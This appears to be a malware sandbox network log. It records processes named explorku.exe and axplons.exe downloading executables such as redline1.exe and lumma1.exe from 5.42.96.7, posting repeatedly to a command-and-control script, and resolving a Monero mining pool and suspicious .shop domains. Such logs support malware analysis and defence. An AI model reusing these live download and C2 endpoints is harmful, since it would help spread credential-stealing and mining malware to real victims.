                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  onlycitylink.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.182.192
                                                                                                                                                                                                                                                                  onlycitylink.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.21.18.166
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  235.3.20.104.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  235.3.20.104.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  192.186.117.34.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  192.186.117.34.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  192.186.117.34.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  19218611734bcgoogleusercontentcom
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  self.events.data.microsoft.com
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  self.events.data.microsoft.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  self.events.data.microsoft.com
                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                  self-events-data.trafficmanager.net
                                                                                                                                                                                                                                                                  self-events-data.trafficmanager.net
                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                  onedscolprdwus20.westus.cloudapp.azure.com
                                                                                                                                                                                                                                                                  onedscolprdwus20.westus.cloudapp.azure.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  20.189.173.25
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://5.42.96.7/cost/sarra.exe
                                                                                                                                                                                                                                                                  explorku.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /cost/sarra.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:17 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                  Content-Length: 2490880
                                                                                                                                                                                                                                                                  Last-Modified: Sat, 11 May 2024 22:16:57 GMT
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  ETag: "663fee59-260200"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  GET
  http://5.42.96.7/mine/amers.exe
  explorku.exe
  Remote address: 5.42.96.7:80
  Request:
  GET /mine/amers.exe HTTP/1.1
  Host: 5.42.96.7
  Response:
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Sat, 11 May 2024 22:38:19 GMT
  Content-Type: application/octet-stream
  Content-Length: 1882112
  Last-Modified: Sat, 11 May 2024 22:18:02 GMT
  Connection: keep-alive
  ETag: "663fee9a-1cb800"
  Accept-Ranges: bytes
• [RU] GET http://5.42.96.7/cost/random.exe
  explorku.exe
  Remote address: 5.42.96.7:80
  Request:
  GET /cost/random.exe HTTP/1.1
  Host: 5.42.96.7
  Response:
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Sat, 11 May 2024 22:38:22 GMT
  Content-Type: application/octet-stream
  Content-Length: 2295824
  Last-Modified: Sat, 11 May 2024 22:16:28 GMT
  Connection: keep-alive
  ETag: "663fee3c-230810"
  Accept-Ranges: bytes
• [US] DNS 7.96.42.5.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request: 7.96.42.5.in-addr.arpa IN PTR
  Response:
• [US] DNS acceptabledcooeprs.shop
  Remote address: 8.8.8.8:53
  Request: acceptabledcooeprs.shop IN A
  Response: acceptabledcooeprs.shop IN A 104.21.59.156
            acceptabledcooeprs.shop IN A 172.67.180.137
• [US] DNS 5.192.67.172.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request: 5.192.67.172.in-addr.arpa IN PTR
  Response:
• [US] DNS 146.53.21.104.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request: 146.53.21.104.in-addr.arpa IN PTR
  Response:
• [US] DNS 72.183.67.172.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request: 72.183.67.172.in-addr.arpa IN PTR
  Response:
• [US] DNS 184.139.19.162.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request: 184.139.19.162.in-addr.arpa IN PTR
  Response: 184.139.19.162.in-addr.arpa IN PTR p062minerscom
• [US] DNS 40.169.67.172.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request: 40.169.67.172.in-addr.arpa IN PTR
  Response:
• [US] DNS headraisepresidensu.shop
  Remote address: 8.8.8.8:53
  Request: headraisepresidensu.shop IN A
  Response: headraisepresidensu.shop IN A 104.21.50.137
            headraisepresidensu.shop IN A 172.67.206.145
• [US] DNS 137.50.21.104.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request: 137.50.21.104.in-addr.arpa IN PTR
  Response:
• [US]
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  157.92.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  157.92.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  ctldl.windowsupdate.com
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  ctldl.windowsupdate.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  ctldl.windowsupdate.com
                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                  ctldl.windowsupdate.com.delivery.microsoft.com
                                                                                                                                                                                                                                                                  ctldl.windowsupdate.com.delivery.microsoft.com
                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                  wu-b-net.trafficmanager.net
                                                                                                                                                                                                                                                                  wu-b-net.trafficmanager.net
                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                  download.windowsupdate.com.edgesuite.net
                                                                                                                                                                                                                                                                  download.windowsupdate.com.edgesuite.net
                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                  a767.dspw65.akamai.net
                                                                                                                                                                                                                                                                  a767.dspw65.akamai.net
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  2.18.190.77
                                                                                                                                                                                                                                                                  a767.dspw65.akamai.net
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  2.18.190.79
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  pastebin.com
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  pastebin.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  pastebin.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.20.3.235
                                                                                                                                                                                                                                                                  pastebin.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.19.24
                                                                                                                                                                                                                                                                  pastebin.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.20.4.235
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  firstfirecar.com
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  firstfirecar.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  firstfirecar.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.21.60.76
                                                                                                                                                                                                                                                                  firstfirecar.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.193.220
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  14.90.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  14.90.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  svc.iolo.com
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  svc.iolo.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  svc.iolo.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  20.157.87.45
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  148.155.9.20.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  148.155.9.20.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://5.42.96.7/zamo7h/index.php
                                                                                                                                                                                                                                                                  axplons.exe
  Remote address: 5.42.96.7:80
  Request
    POST /zamo7h/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 5.42.96.7
    Content-Length: 4
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 11 May 2024 22:38:26 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
• [RU] POST http://5.42.96.7/zamo7h/index.php (axplons.exe)
  Remote address: 5.42.96.7:80
  Request
    POST /zamo7h/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 5.42.96.7
    Content-Length: 160
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 11 May 2024 22:38:26 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
• [RU] GET http://5.42.96.7/lend/alex.exe (axplons.exe)
  Remote address: 5.42.96.7:80
  Request
    GET /lend/alex.exe HTTP/1.1
    Host: 5.42.96.7
  Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 11 May 2024 22:38:26 GMT
    Content-Type: application/octet-stream
    Content-Length: 2831872
    Last-Modified: Sat, 11 May 2024 20:05:26 GMT
    Connection: keep-alive
    ETag: "663fcf86-2b3600"
    Accept-Ranges: bytes
• [RU] POST http://5.42.96.7/zamo7h/index.php (axplons.exe)
  Remote address: 5.42.96.7:80
  Request
    POST /zamo7h/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 5.42.96.7
    Content-Length: 31
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 11 May 2024 22:38:28 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
• [RU] GET http://5.42.96.7/lend/gold.exe (axplons.exe)
  Remote address: 5.42.96.7:80
  Request
    GET /lend/gold.exe HTTP/1.1
    Host: 5.42.96.7
  Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 11 May 2024 22:38:28 GMT
    Content-Type: application/octet-stream
    Content-Length: 412448
    Last-Modified: Sat, 11 May 2024 20:05:30 GMT
    Connection: keep-alive
    ETag: "663fcf8a-64b20"
    Accept-Ranges: bytes
• [RU] POST http://5.42.96.7/zamo7h/index.php (axplons.exe)
  Remote address: 5.42.96.7:80
  Request
    POST /zamo7h/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 5.42.96.7
    Content-Length: 31
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 11 May 2024 22:38:30 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
• [RU] GET http://5.42.96.7/lend/redline1.exe (axplons.exe)
  Remote address: 5.42.96.7:80
  Request
    GET /lend/redline1.exe HTTP/1.1
    Host: 5.42.96.7
  Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 11 May 2024 22:38:31 GMT
    Content-Type: application/octet-stream
    Content-Length: 311296
    Last-Modified: Sat, 11 May 2024 20:05:37 GMT
    Connection: keep-alive
    ETag: "663fcf91-4c000"
    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://5.42.96.7/zamo7h/index.php
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /zamo7h/index.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:34 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://5.42.96.7/zamo7h/index.php
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /zamo7h/index.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:40 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://5.42.96.7/lend/swizzhis.exe
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /lend/swizzhis.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:40 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                  Content-Length: 1084416
                                                                                                                                                                                                                                                                  Last-Modified: Sat, 11 May 2024 20:43:13 GMT
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  ETag: "663fd861-108c00"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://5.42.96.7/zamo7h/index.php
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /zamo7h/index.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:44 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://5.42.96.7/lend/udated.exe
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /lend/udated.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:45 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                  Content-Length: 521728
                                                                                                                                                                                                                                                                  Last-Modified: Sat, 11 May 2024 20:13:13 GMT
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  ETag: "663fd159-7f600"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://5.42.96.7/zamo7h/index.php
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /zamo7h/index.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:47 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://5.42.96.7/lend/lumma1.exe
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /lend/lumma1.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:47 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                  Content-Length: 1274880
                                                                                                                                                                                                                                                                  Last-Modified: Sat, 11 May 2024 20:48:32 GMT
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  ETag: "663fd9a0-137400"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://5.42.96.7/zamo7h/index.php
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /zamo7h/index.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:50 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://5.42.96.7/zamo7h/index.php
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /zamo7h/index.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:45 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://5.42.96.7/lend/deat.exe
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /lend/deat.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:45 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                  Content-Length: 363520
                                                                                                                                                                                                                                                                  Last-Modified: Sat, 11 May 2024 21:47:52 GMT
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  ETag: "663fe788-58c00"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://5.42.96.7/zamo7h/index.php
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /zamo7h/index.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:39:47 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  216.39.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  216.39.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
DNS lookups, continued (every query sent to 8.8.8.8:53, resolver geolocated US)

Query                          Type  Answer
-----------------------------  ----  ---------------------------------------------
139.173.67.172.in-addr.arpa    PTR   (empty response)
30.186.67.172.in-addr.arpa     PTR   (empty response)
xmr.2miners.com                A     162.19.139.184
147.162.67.172.in-addr.arpa    PTR   (empty response)
251.62.21.104.in-addr.arpa     PTR   (empty response)
1.141.192.104.in-addr.arpa     PTR   (empty response)
125.3.21.104.in-addr.arpa      PTR   (empty response)
112.242.109.65.in-addr.arpa    PTR   static.112.242.109.65.clients.your-server.de
yip.su                         A     172.67.169.89, 104.21.79.77
jonathantwo.com                A     104.21.31.124, 172.67.176.131
192.182.67.172.in-addr.arpa    PTR   (empty response)
228.128.172.185.in-addr.arpa   PTR   (empty response)
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  westus2-2.in.applicationinsights.azure.com
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  westus2-2.in.applicationinsights.azure.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  westus2-2.in.applicationinsights.azure.com
                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                  westus2-2.in.ai.monitor.azure.com
                                                                                                                                                                                                                                                                  westus2-2.in.ai.monitor.azure.com
                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                  westus2-2.in.ai.privatelink.monitor.azure.com
                                                                                                                                                                                                                                                                  westus2-2.in.ai.privatelink.monitor.azure.com
                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                  gig-ai-prod-westus2-0.trafficmanager.net
                                                                                                                                                                                                                                                                  gig-ai-prod-westus2-0.trafficmanager.net
                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                  gig-ai-prod-wus2-01-app-v4-tag.westus2.cloudapp.azure.com
                                                                                                                                                                                                                                                                  gig-ai-prod-wus2-01-app-v4-tag.westus2.cloudapp.azure.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  20.9.155.148
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
